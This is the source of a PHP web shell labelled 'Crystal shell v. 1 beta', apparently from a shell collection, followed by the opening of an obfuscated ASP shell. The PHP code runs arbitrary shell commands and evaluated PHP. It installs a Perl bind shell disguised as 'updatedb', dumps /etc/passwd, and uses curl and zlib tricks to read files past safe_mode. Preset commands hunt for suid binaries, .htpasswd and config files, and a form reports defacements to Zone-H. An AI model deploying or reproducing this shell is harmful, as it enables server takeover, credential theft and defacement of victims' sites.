<input type='reset' value=' reset '>
</form>
", 3,$ERORR);
}
// id //
if ($_POST['plugin'] ){
switch($_POST['plugin']){
case("cat /etc/passwd"):
for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "<br>";
}
}
break;
}
}
// imap //
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]"."<p> </p>" ;
echo "</pre>";
imap_close($stream);
}
// CURL //
if(empty($_POST['curl'])){
} else {
$m=$_POST['curl'];
$ch =
curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
}
// copy//
$u1p="";
$tymczas="";
if(empty($_POST['copy'])){
} else {
$u1p=$_POST['copy'];
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$u1p, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
}
@$dir = $_POST['dir'];
$dir = stripslashes($dir);
@$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);
$REQUEST_URI = $_SERVER['REQUEST_URI'];
$dires = '';
$files = '';
if (isset($_POST['port'])){
$bind = "
#!/usr/bin/perl
\$port = {$_POST['port']};
\$port = \$ARGV[0] if \$ARGV[0];
exit if fork;
$0 = \"updatedb\" . \" \" x100;
\$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(\$port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, \"<&X\";
open STDOUT, \">&X\";
open STDERR, \">&X\";
close X;
exec(\"/bin/sh\");
}
close X;
}
";}
function decode($buffer){
return convert_cyr_string ($buffer, 'd', 'w');
}
function execute($com)
{
if (!empty($com))
{
if(function_exists('exec'))
{
exec($com,$arr);
echo implode('
',$arr);
}
elseif(function_exists('shell_exec'))
{
echo shell_exec($com);
}
elseif(function_exists('system'))
{
echo system($com);
}
elseif(function_exists('passthru'))
{
echo passthru($com);
}
}
}
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}
if (isset($_POST['installbind'])){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl " . $_POST['installpath']);
chdir($dir);
}
@$ef = stripslashes($_POST['editfile']);
if ($ef){
$fp = fopen($ef, "r");
$filearr = file($ef);
$string = '';
$content = '';
foreach ($filearr as $string){
$string = str_replace("<" , "<" , $string);
$string = str_replace(">" , ">" , $string);
$content = $content . $string;
}
echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
fclose($fp);
}
if(isset($_POST['savefile'])){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>saved -OK!</div></center>";
}
if (isset($_POST['php'])){
echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
}
if(isset($_POST['phpcode'])){
echo "<center><div id=logostrip>Results of PHP execution<br><br>";
@eval(stripslashes($_POST['phpcode']));
echo "</div></center>";
}
if ($cmd){
if($sertype == "winda"){
ob_start();
execute($cmd);
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
else{
ob_start();
echo decode(execute($cmd));
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
if (trim($buffer)){
echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
echo decode($buffer);
echo "</textarea></center></div>";
}
}
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}
if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"..Exec..\"></form>";
if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
Including from here: "
. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
?>
</td></tr></table></p></td></tr></table>
</a><br><hr size="1" noshade><p align="right">
<font face="Wingdings 3" size="5" color="#DCE7EF"><</font><b><select name="act"><option value="ls">
With selected:</option><option value="delete">Delete</option><option value="archive">
Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect">
Unselect</option></select> <input type="submit" value="Confirm"></p></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
<b>
:: </b>
<font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
<?
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
?>
<input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
</p>
</td>
<td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
<form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
<font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
-----------------------------------------------------------</option>
<option value="ls -la /var/lib/mysq">ls MySQL</option>
<option value="which curl">cURL ?</option>
<option value="which wget">Wget ?</option>
<option value="which lynx">Lynx ?</option>
<option value="which links">links ?</option>
<option value="which fetch">fetch ?</option>
<option value="which GET">GET ?</option>
<option value="which per">Perl ?</option>
<option value="gcc --help">C gcc Help ?</option>
<option value="tar --help">tar Help ?</option>
<option value="cat /etc/passwd">Get passwd !!!</option>
<option value="cat /etc/hosts">Get hosts</option>
<option value="perl --help">Perl Help ?</option>
<option value="find / -type f -perm -04000 -ls">
find all suid files</option><option value="find . -type f -perm -04000 -ls">
find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
find all sgid files</option><option value="find . -type f -perm -02000 -ls">
find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
find config.inc.php files</option><option value="find / -type f -name "config*"">
find config* files</option><option value="find . -type f -name "config*"">
find config* files in current dir</option><option value="find / -perm -2 -ls">
find all writable directories and files</option><option value="find . -perm -2 -ls">
find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
find all service.pwd files</option><option value="find . -type f -name service.pwd">
find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
find all .bash_history files</option><option value="find . -type f -name .bash_history">
find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
find .fetchmailrc files in current dir</option><option value="lsattr -va">
list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
show opened ports</option></select><input type="hidden" name="cmd_txt" value="1"> <input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF"></font></a><font color="#00FF00"><br>
</font>
<a bookmark="minipanel">
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr>
<td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
<p align="center">
<a bookmark="minipanel">
<b><font face="verdana" color="red" size="4">
<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">"</font></p><p align="center">
<?
if ($act == "edit") {echo "<center><b> :<br><br> <br> config.php <br>Edit<br> <br> <br> washer-crystal.txt </a>.</b>";}
?>
</p>
<p> </p>
<p> <?
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
File to edit:
<input type=\"text\" name=\"editfile\" >
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\"></form></div>";
?>
</p>
</form></center></p></td>
<td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
<?
if ($act == "upload") {echo "<center><b> :<br><br> <br> <br>UPLOAD< </a>.</b>";}
?><a bookmark="minipanel"><b><font size="2">::
</font>
</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>Ņ</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">
<?
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<INPUT type=\"file\" name=\"userfile\">
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";
?>
<p></form></p></td>
</tr>
</table> <b>
<font size=-2 face=verdana color="white">
<p> <a href="?act=Defacer">Defacer Zone-H</a></font><p align="center">
</p>
<?
if ($act == "Defacer") {echo "<center><b>CRYSTAL-H:<br><br> Defacer<br> Victim<br> Attack Mode <br> Attack Reason <br> sand <br> Attacks On Hold</a>.</b>";}
?> <p align="center"><font face="Verdana" color="#CC0000">
<SCRIPT language=JavaScript type=text/javascript>
<!--
function validate(){
document.notifyForm.action = "http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/"
document.notifyForm.submit();
}
//-->
</SCRIPT>
Defacer </font></font></font>
<font face=Verdana color=#CC0000>
Zone-h</font><FORM name=notifyForm
action=http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/
method=post>
<TABLE class=contentpane cellSpacing=0 cellPadding=0
width="100%" border=0>
<TBODY>
<!-- DESCRIPTION -->
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa"></TD></TR><!-- INSTRUCTIONS -->
</TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=10 width="100%" border=0 style="color: #CC0000; border: 1px outset #000000; background-color: #000000">
<TBODY>
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD align=left style="color: #DCE7EF; border: 1px solid #FFFFFF; background-color: #000000" bgcolor="#000000" bordercolorlight="#000000" bordercolordark="#000000">
<TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
<TBODY>
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
align=left><SPAN
style="FONT-SIZE: 4px"> </SPAN></TD></TR></TBODY></TABLE><!-- Input Form --><TABLE class=notifyForm width="100%">
<TBODY>
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD noWrap align=left width="15%"
height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000"><b><font size="1" color="#FF0000">
::Defacer::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
<INPUT
class=inputbox id=defacer style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
maxLength=64 name=defacer size="1" value="Super-Crystal"> </font></font>
</font></TD>
<font size=-2 face=verdana color=white>
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
<b><font size="1" color="#FF0000">::Victim::</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD><TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
<INPUT
class=inputbox id=domain style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE"
maxLength=250 value=http://www.microsoft.com name=domain size="1"> </TD>
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
<b>
<font color="#FF0000" size="1">Attack Mode</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
<SELECT class=inputbox
style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=method size="1"> <OPTION
value="" selected>choose</OPTION> <OPTION
value=23>Access credentials through Man In the
Middle attack</OPTION><OPTION value=22>Attack
against the administrator/user (password
stealing/sniffing)</OPTION><OPTION value=29>DNS
attack through cache poisoning</OPTION><OPTION
value=28>DNS attack through social engineering</OPTION><OPTION value=17>
File Inclusion</OPTION><OPTION value=9>FTP Server
intrusion</OPTION><OPTION value=8>Mail Server
intrusion</OPTION><OPTION value=30>Not available</OPTION><OPTION value=14>
Other Server intrusion</OPTION><OPTION value=18>
Other Web Application bug</OPTION><OPTION value=19>
Remote administrative panel access through
bruteforcing</OPTION><OPTION value=20>Remote
administrative panel access through password
guessing</OPTION><OPTION value=21>Remote
administrative panel access through social
engineering</OPTION><OPTION value=25>Remote service
password bruteforce</OPTION><OPTION
value=24>Remote service password guessing</OPTION><OPTION value=26>
Rerouting after attacking the Firewall</OPTION><OPTION
value=27>Rerouting after attacking the Router</OPTION><OPTION value=12>
RPC Server intrusion</OPTION><OPTION value=13>Shares
misconfiguration</OPTION><OPTION value=15>SQL
Injection</OPTION><OPTION value=10>SSH Server
intrusion</OPTION><OPTION value=11>Telnet Server
intrusion</OPTION><OPTION value=16>URL Poisoning</OPTION><OPTION value=7>
Web Server external module intrusion</OPTION><OPTION
value=6>Web Server intrusion</OPTION></SELECT></TD></TR><TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD noWrap align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
<b>
<font size="1" color="#FF0000">Attack Reason</font></b>:<font size=-2 face=verdana color=white><b><font face=Wingdings color=gray size="1"></font></TD><TD align=left height=20 style="color: #000000; border: 1px solid #000000; background-color: #000000">
<SELECT class=inputbox
style="WIDTH: 276px; color:#CC0000; background-color:#EEEEEE" name=reason size="1"> <OPTION
value="" selected>choose</OPTION> <OPTION
value=4>As a challenge</OPTION><OPTION
value=1>Heh...just for fun!</OPTION><OPTION
value=5>I just want to be the best defacer</OPTION><OPTION value=7>
Not available</OPTION><OPTION
value=6>Patriotism</OPTION><OPTION
value=3>Political reasons</OPTION><OPTION
value=2>Revenge against that website</OPTION></SELECT></TD></TR></TBODY></TABLE><TABLE width="100%" style="border: 1px outset #eeeeee; background-color: #EEEEEE">
<TBODY>
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD style="border-left:1px solid #eeeeee; border-right:1px solid #aaaaaa; border-top:1px solid #eeeeee; border-bottom:1px solid #aaaaaa; BACKGROUND-COLOR: #000000"
align=left><SPAN
style="FONT-SIZE: 4px"> </SPAN></TD></TR></TBODY></TABLE><DIV style="CLEAR: both"></DIV>
<TABLE class=notifyForm width="100%">
<TBODY>
<TR style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa">
<TD align=left style="border-left: 1px solid #eeeeee; border-right: 1px solid #aaaaaa; border-top: 1px solid #eeeeee; border-bottom: 1px solid #aaaaaa" bgcolor="#000000">
<INPUT class=button onclick=validate() type=button value=Send name=send style="color: #CC0000; border: 1px solid #C0C0C0; background-color: #EEEEEE"> <b><font size=4 face="Wingdings 3">:</font></b>
</font></font>
<font size=6 face=Webdings color="#FF0000">L </font><b>
<a class="sublevel" href="http://www.zone-h.org/component/option,com_attacks/Itemid,45/">
<font color="#FF0000">Attacks On Hold</font></a></b><font color="#FF0000">
</font>
<font size=6 face=Webdings color="#FF0000">L</TD></TR></TBODY></TABLE><INPUT type=hidden
value=com_notify name=option style="font-family: Verdana; font-size: 10px; color: black; border: 2px solid black; background-color: #C0C0C0"></TR></TBODY></TABLE></FORM></font></b><br>
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
<b>
</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. 1 beta </b><font color="#CC0000"><b>oded by</b> </font><b><a href="http://www.tryag.com">TrYaG Team</a> <span lang="en-us">l</span></b> <b><a href="?act=team">Arab Security Center Team</a> |<a href="http://www.secure4center.com"><font color="#DCE7EF">securityCenter</font></a>|
: Web </b><font face="Wingdings 3" size="5">x</font></p><p align="center"> </p></td></tr></table>
</a>
<div align="right">
<span lang="en-us"> </span><TABLE cellSpacing=0 cellPadding=0 border=0>
<TBODY>
<TR>
<TD align=middle style="font-family: verdana, arial, 'ms sans serif', sans-serif; font-size: 11px; color: #D5ECF9">
<TABLE class=calendar_table cellSpacing=1 cellPadding=1>
<TBODY>
<TR>
<TD class=calendar_month colSpan=7><span lang="en-us">CRYSTAL-<font color="#CC0000">H</font></span><font color="#CC0000">
2006</font></TD></TR><TR>
<TD class=calendar_days>P</TD><TD class=calendar_days>P</TD><TD class=calendar_days>S</TD><TD class=calendar_days>C</TD><TD class=calendar_days>P</TD><TD class=calendar_days>C</TD><TD class=calendar_days>C</TD></TR><TR>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD></TR>
<TR>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day>1 </TD></TR>
<TR>
<TD class=calendar_day>2 </TD>
<TD class=calendar_day>3 </TD>
<TD class=calendar_day><font color="#FF0000">4 </font> </TD>
<TD class=calendar_day><font color="#FF0000">5 </font> </TD>
<TD class=calendar_day><font color="#FF0000">6 </font> </TD>
<TD class=calendar_day><font color="#FF0000">7 </font> </TD>
<TD class=calendar_day><font color="#FF0000">8 </font> </TD></TR>
<TR>
<TD class=calendar_day>9 </TD>
<TD class=calendar_day><font color="#FF0000">10 </font> </TD>
<TD class=calendar_day><font color="#FF0000">11 </font> </TD>
<TD class=calendar_day><font color="#FF0000">12 </font> </TD>
<TD class=calendar_day>13</TD><TD class=calendar_day>14 </TD>
<TD class=calendar_day>15 </TD></TR>
<TR>
<TD class=calendar_day><font color="#FF0000">16 </font> </TD>
<TD class=calendar_day><font color="#FF0000">17 </font> </TD>
<TD class=calendar_day><font color="#FF0000">18</font></TD><TD class=calendar_day>19</TD><TD class=calendar_day>20 </TD>
<TD class=calendar_day>21 </TD>
<TD class=calendar_current_day>22 </TD></TR>
<TR>
<TD class=calendar_day>23</TD><TD class=calendar_day>24</TD><TD class=calendar_day>25</TD><TD class=calendar_day>26</TD><TD class=calendar_day><font color="#FF0000">27</font></TD><TD class=calendar_day><font color="#FF0000">28</font></TD><TD class=calendar_day><font color="#FF0000">29</font></TD></TR><TR>
<TD class=calendar_day>30</TD><TD class=calendar_day>31</TD><TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD>
<TD class=calendar_day></TD></TR></TBODY></TABLE></TD></TR>
</TBODY></TABLE>
</div>
</body></html>
================================================
FILE: 138shell/C/CyberSpy5.Asp.txt
================================================
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^FkQBAA==@#@&rU,2MDWMP"n/!:nPg+aO@#@&?.\DRU^.kaY:kh+6;DP~',{ Z!@#@&@#@&frh,1n/ nw?6@#@&"+/aW d+c.kD+~E@!/YHs+@*PA}9ePPPUZ]rJJ~b]O~)?AO/6drIl~[&$&~f~i~UZ"rSdAz]OzI]rqO/6drI=~a2&swffi,8,@!&/Oz^+@*J@#@&I/2G /+ MkO+,E@!4G9X,4o1W^GD{!T!Z!T~D+6DxB[!!woT!EP^kU3xv[!TswT!EPCsbx3xv[!TswTZB~7Vbx3{B[T!wsT!EPOGa:lMLk '!@*E@#@&@#@&`w[lOn;W[+,xPrtOOa)z&ASh ZH8DRqlMDkKDc6DTz/X(+.jaX*c)/agu-kE@#@&@#@&BRORR ORO RO O)UKxkh~`wsWm[;VCk/,?YmDD~ZKNnO ORR OO RO OO RRO O ORORR @#@&Z^C/kPor^+j2sKl[+M@#@&dK!4^km,PwrV/@#@&in.r7lY~sKD:Asn:mxhD#@#@&7hDr\mO+,?;8,ZVCdk{(xbOblsby`#@#@&i7?Y~sbVnd,'PUnD7+Dc/.+mYr8Ln^D`E?1.kaYrUTRfr^DkGxm.HJb@#@&id?Y,oWM:3V:CUhD.,xPU+D7n.R;DlO+68N+^YvE?1Dr2DkxL Gk^YbG l.HJ*@#@&i2 [PUE8@#@&dK.b\lDnPUE4,/slk/|KnDhr lO+vb@#@&d7rwPqd6(LnmDcwks/*PK4+ @#@&id7sbVndcI+sG\bV^cb@#@&didj+O~wks+k~',1GO4kxL@#@&d72 [,ko@#@&idkwP&dr(LnmD`oGM:2^n:mxnM#bP:tx@#@&77isGDs3V:CUhD. ]:G\)^Vc*@#@&ddi?OPwW.:AVnhmxnM#P{P1KO4k o@#@&7d3U9Prs@#@&dAx[~UE4@#@∈4^r1PKMWa+DDX,!+DPoWM:cd&xNa#@#@&dioGDsP{PEJ@#@&idrs,oWM:3s:lUKM. 2XrkYdvS;l/`k(x9+a#*PP4xPwGDsP',oGDs2^+hlUKM. qDn:vS/Ck+`d( Nn6*b@#@&7Ax9PnMWanDDX@#@∈8^km,9+6lE^O~?!4,j2VGC9`b@#@&7dGkh~(kfCOm~~/&UaEOgls+@#@&di9ksPUnK/$nTkxB~xhW/AU[~,xhWd~~-GlOl~GE NdS,xfCOmAGE [hWd@#@&idfb:,UnK/ok^+S~ nWk$W!xN@#@&7d(kGlOl~x,In;!n/DR$r lDz]l[`"n$EnkYcKWDl^$XD+d#@#@&77 nWk$+Tkx,x~F@#@&idUnGdAx[P{~q /O.~`xKGkAnobUBP8bfmYlBP;$XD+jYMkULvZtMcF2##*@#@&dikwPcxKGk2UN UnK/$nTkxb~@!'~!,P4+U,2XkY,?!8@#@&d7\GlOC~WE [/,'Ptr[Av4bfCYCS,xKWk$+TkUS,xnGdAx[O KK/$obx#@#@&i7xGlOl~W;U9nWk~',qxkO.AvFBP8k9CDlSP79lDl$G!xNdb@#@&7dGG,jUDk^PxGlDCAKEUNhWd~{Pq dYMA`(r9lDlBP-fCOmAGE [/,[~/~XYnjDDrxTcrORr#*@#@&idiUnK/~',qUdDDAvUfmYl~G;x9nK/SP8rGlOlB~Z~XOnUYDrUT`EZKUD+UDOGk/aWkrYbWUJ*#@#@&idd KWkP',(U/DD~`UnGdBP8kGCYm~~/~XYnjDDrxTcrxCs+{J#*@#@&7dixKWkAnLbxP{~xhW/,Q~v@#@&id7xKGk2UN,xP&xdOMA`UKK/$+Tr 